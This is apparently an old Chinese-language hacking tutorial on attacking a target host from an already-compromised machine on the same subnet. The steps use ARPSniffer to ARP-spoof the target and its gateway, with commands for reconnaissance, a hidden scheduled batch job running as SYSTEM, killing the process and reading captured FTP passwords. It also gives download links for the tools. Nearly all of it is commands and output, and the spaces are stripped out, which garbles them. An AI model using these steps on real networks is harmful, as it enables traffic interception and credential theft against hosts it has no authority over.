渗透攻击必用命令与步骤

假设想攻击的主机IP是:61.139.1.79
同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆

第一步:
tracert61.139.1.1

C:WIN2000system32>tracert61.139.1.1

TracingroutetoHACK-4FJ7EARC[61.139.1.1]
overamaximumof30hops:

1<10ms<10ms<10msHACK-4FJ7EARC[61.139.1.1]

Tracecomplete.

这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能
进行ARPSNIFFER了

第二步:看本机IP设置和网卡情况
C:WIN2000system32>ipconfig/all

Windows2000IPConfiguration

HostName............:smscomputer
PrimaryDNSSuffix.......:
NodeType............:Broadcast
IPRoutingEnabled........:No
WINSProxyEnabled........:No

EthernetadapterIntelFastEthernetLANController-onboard:

Connection-specificDNSSuffix.:
Description...........:Intel(R)8255xBasedNetworkConnection
PhysicalAddress.........:00-B0-D0-22-10-C6
DHCPEnabled...........:No
IPAddress............:61.139.1.2
SubnetMask...........:255.255.255.0
DefaultGateway.........:61.139.1.65
DNSServers...........:61.139.1.73

说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地
方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0
的话也只能嗅探到通过自已的数据哟.
从上面我们还可以知道网关是61.139.1.65


第三步:查看本机时间
C:WIN2000system32>nettime127.0.0.1

127.0.0.1的当前时间是2003/1/28下午09:13

命令完成成功

要注意的是这儿的时间是12小时式,用at命令应要24小时式

第四步:编写启动ARPsniffer的bat文件
C:WIN2000system32>echoarpsniffer61.139.1.6561.139.1.79211.txt/reset>c:winnta.bat

注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:
ARPSniffer0.5(RouterInside),bynetXeyes,SpecialThanksBB
www.netXeyes.com2002,security@vip.sina.com

NetworkAdapter0:D-LinkDE-528EthernetPCIAdapter
NetworkAdapter1:Intel(R)PRO/100+PCIAdapter(这个地方选第五个参数)

Usage:ArpSniffer[/RESET]


第五步:后台运行开始嗅探咯
C:winntsystem32>at127.0.0.120:44c:winnta.bat

注意:这儿的时间要用24小时式
arpsniffer最好拷到system32目录下,记录文件也会生成在这儿
执行完第四步要先安装WINPCAP2.1驱动
同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子

第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉
以SYSTEM权限启动的ARPSniffer程序
C:winntsystem32>pulist
...................
conime.exe248NTAUTHORITYSYSTEM
explorer.exe1864SMSCOMPUTERAdministrator
CSRSS.EXE2256NTAUTHORITYSYSTEM
Arpsniffer.exe2322NTAUTHORITYSYSTEM----就是它了!
WINLOGON.EXE2344NTAUTHORITYSYSTEM
......................

杀了它
C:winntsystem32>pskill2322
PsKillv1.03-localandremoteprocesskiller
Copyright(C)2000MarkRussinovich
http://www.sysinternals.com

Process2322killed.

C:winntsystem32>type1.txt我的例子中嗅探的是FTP密码:)


...............
61.188.218.179(1404)->61.139.1.79(21)PASSaaabbb
61.139.1.79(21)->61.188.218.179(1404)530Userczy82cannotlogin.
61.139.1.79(21)->61.188.218.179(1404)530Userczy82cannotlogin.
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.139.1.79(21)->61.188.218.179(1404)221
61.139.1.79(21)->61.188.218.179(1404)221
............
............

特别要注意的就是PASS哈:)


----------------------------------------------------
付录:
前台正常执行的显示

C:>arpsniffer61.139.1.6561.139.1.79211.txt/reset

ARPSniffer0.5(RouterInside),bynetXeyes,SpecialThanksBB
www.netXeyes.com2002,security@vip.sina.com

NetworkAdapter0:Intel(R)8255xBasedNetworkConnection


EnableIPRouter....OK

Get61.139.1.65HardwareAddress:00-00-0c-07-ac-02
Get61.139.1.79HardwareAddress:00-b0-d0-22-10-cb
Get61.139.1.88HardwareAddress:00-b0-d0-22-10-c6

Spoof61.139.1.79:Macof61.139.1.65===>Macof61.139.1.88
Spoof61.139.1.65:Macof61.139.1.79===>Macof61.139.1.88
有时这儿要先显示cannotopendriver(0)不管它等一下就可以了
BeginSniffer.........

文章中提到的程序下载:
pskill.exe/pulist.exe在http://www.haowawa.com/down/pstools/
APRSniffer和winpcap驱动http://www.netxeyes.org/2002.html